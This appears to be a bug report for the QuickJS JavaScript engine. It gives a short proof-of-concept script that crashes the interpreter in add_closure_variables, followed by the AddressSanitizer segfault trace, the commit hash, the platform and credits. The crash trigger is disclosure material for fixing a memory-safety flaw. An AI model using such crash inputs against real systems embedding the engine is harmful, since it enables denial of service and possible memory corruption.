```javascript
class e { method ( { } = eval ( " var arguments ='–� " ) ) { arguments [ undefined ] = arguments [ 0 ] ; this - this. method ( ) ; return arguments ; } } class t extends e { method (... e ) { return super. method (... e ) ; } } var r = new t ( ) ; r. method ( ) ; r. method ( ) ; r. method ( ) ;
```
class e {
method ( { } = eval ( " " ) ) { }
}
class t extends e {
method (... e ) {
return super. method ( ) ;
}
}
var r = new t ( ) ;
r. method ( ) ;
Execution steps & Output
$ ./qjs poc.js
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1074913==ERROR: AddressSanitizer: SEGV on unknown address 0x6120001018b4 (pc 0x564b1c4dd487 bp 0x7ffce71e0450 sp 0x7ffce71e0290 T0)
==1074913==The signal is caused by a READ memory access.
#0 0x564b1c4dd486 in add_closure_variables quickjs/quickjs.c:31101
#1 0x564b1c4dd486 in __JS_EvalInternal quickjs/quickjs.c:34444
#2 0x564b1c406d2e in JS_EvalInternal quickjs/quickjs.c:34501
#3 0x564b1c406d2e in JS_EvalObject quickjs/quickjs.c:34517
#4 0x564b1c3a5155 in JS_CallInternal quickjs/quickjs.c:16761
#5 0x564b1c391edb in JS_CallInternal quickjs/quickjs.c:16615
#6 0x564b1c391edb in JS_CallInternal quickjs/quickjs.c:16615
#7 0x564b1c3b3649 in JS_CallFree quickjs/quickjs.c:18694
#8 0x564b1c4da9a1 in JS_EvalFunctionInternal quickjs/quickjs.c:34348
#9 0x564b1c4de0d2 in __JS_EvalInternal quickjs/quickjs.c:34483
#10 0x564b1c4d1f48 in JS_EvalInternal quickjs/quickjs.c:34501
#11 0x564b1c4d1f48 in JS_EvalThis quickjs/quickjs.c:34532
#12 0x564b1c4d1fd7 in JS_Eval quickjs/quickjs.c:34540
#13 0x564b1c3654d2 in eval_buf quickjs/qjs.c:71
#14 0x564b1c365a42 in eval_file quickjs/qjs.c:103
#15 0x564b1c3648d4 in main quickjs/qjs.c:516
#16 0x7f27c95c0082 in __libc_start_main ../csu/libc-start.c:308
#17 0x564b1c364e4d in _start (quickjs/qjs+0x35e4d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV quickjs/quickjs.c:31101 in add_closure_variables
==1074913==ABORTING
QuickJS Version
Version : https://github.com/bellard/quickjs/commit/6a89d7c27099be84e5312a7ec73205d6a7abe1b4
platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
Build
PoC
testcase
```javascript class e { method ( { } = eval ( " var arguments ='–� " ) ) { arguments [ undefined ] = arguments [ 0 ] ; this - this. method ( ) ; return arguments ; } } class t extends e { method (... e ) { return super. method (... e ) ; } } var r = new t ( ) ; r. method ( ) ; r. method ( ) ; r. method ( ) ; ```
Execution steps & Output
when executed in release mode
Credits: @Ye0nny, @EJueon